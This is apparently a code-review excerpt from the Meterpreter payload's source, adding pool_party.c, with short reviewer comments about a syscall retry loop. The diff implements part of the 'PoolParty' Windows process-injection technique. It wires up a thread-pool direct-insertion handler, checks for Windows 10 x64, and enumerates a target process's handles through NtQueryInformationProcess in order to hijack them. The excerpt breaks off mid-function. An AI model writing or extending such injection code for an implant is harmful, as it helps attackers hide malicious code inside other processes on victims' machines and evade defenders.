c/meterpreter/source/metsrv/pool_party.c

```diff
@@ -0,0 +1,299 @@
+			}
+		}
+
+		if (!bError) {
+			poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].handler = remote_tp_direct_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].handler = remote_tp_wait_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].handler = worker_factory_start_routine_overwrite;
+			poolLifeguard->init = TRUE;
+		}
+	}
+
+	if (bError && poolLifeguard != NULL) {
+		HeapFree(hHeap, 0, poolLifeguard);
+		poolLifeguard = NULL;
+	}
+	return poolLifeguard;
+};
+
+// For now we support only Windows 10 x64 -> Windows 10 x64
+BOOL supports_poolparty_injection(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	OSVERSIONINFO os = { 0 };
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
+	os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+	NTSTATUS(*pRtlGetVersion)(OSVERSIONINFO * os) = (NTSTATUS(*)(OSVERSIONINFO * os)) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
+	dprintf("[INJECT][supports_poolparty_injection] RtlGetVersion: %p", pRtlGetVersion);
+	if (!pRtlGetVersion(&os)) {
+		dprintf("[INJECT][supports_poolparty_injection] dwSourceArch: %d dwDestinationArch: %d isWow64: %d", dwSourceArch, dwDestinationArch, isWow64);
+		dprintf("[INJECT][supports_poolparty_injection] os.dwMajorVersion: %d os.dwMinorVersion: %d", os.dwMajorVersion, os.dwMinorVersion);
+		if (os.dwMajorVersion >= 10) {
+			if (dwDestinationArch == dwSourceArch && dwSourceArch == PROCESS_ARCH_X64) {
+				return TRUE;
+			}
+		}
+	}
+	return FALSE;
+}
+
+HANDLE GetRemoteHandle(HANDLE hProcess, LPCWSTR typeName, DWORD dwDesiredAccess) {
+	HANDLE hHijackHandle = INVALID_HANDLE_VALUE;
+	ULONG dwInformationSizeIn = 2048;
+	ULONG dwInformationSizeOut = 0;
+	HANDLE hCurrProcess = GetCurrentProcess();
+	HANDLE hHeap = GetProcessHeap();
+	PPROCESS_HANDLE_SNAPSHOT_INFORMATION lpProcessInfo = NULL;
+	PPUBLIC_OBJECT_TYPE_INFORMATION lpObjectInfo = NULL;
+	pNtDll* ntDll = GetOrInitNtDll();
+
+	DWORD ntStatus = 0;
+	lpProcessInfo = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwInformationSizeIn);
+	dprintf("[INJECT][inject_via_poolparty][get_remote_handle] lpProcessInfo: %p", lpProcessInfo);
+
+	while (TRUE) {
+		ntStatus = ntdll->pNtQueryInformationProcess(hProcess, ProcessHandleInformation, lpProcessInfo, dwInformationSizeIn, &dwInformationSizeOut);
+		dprintf("[INJECT][inject_via_poolparty][get_remote_handle] NtQueryInformationProcess() : %p", ntStatus);
+		if (ntStatus == 0xC0000004L && dwInformationSizeIn != dwInformationSizeOut) {
+			lpProcessInfo = HeapReAlloc(hHeap, 0, lpProcessInfo, dwInformationSizeOut);
+			dprintf("[INJECT][inject_via_poolparty][get_remote_handle] HeapReAlloc lpProcessInfo: %p", lpProcessInfo);
+			dwInformationSizeIn = dwInformationSizeOut;
+			continue;
+		}
+		if (ntStatus != 0 && ntStatus != 0xC0000004L) {
+			HeapFree(hHeap, 0, lpProcessInfo);
+			return INVALID_HANDLE_VALUE;
+		}
+		if (ntStatus == 0) {
+			break;
+		}
```

Comment:
Should we add a `break` here to prevent the loop from running more than once?

Reply:
The loop here is not made for `error-handling` but to get correctly the information from the SYSCALL, so is required, with my tests, i need to loop that 3 times before getting the information properly.

Reply:
Let me think if I can put the ntStatus inside the `while()` without breaking the logic.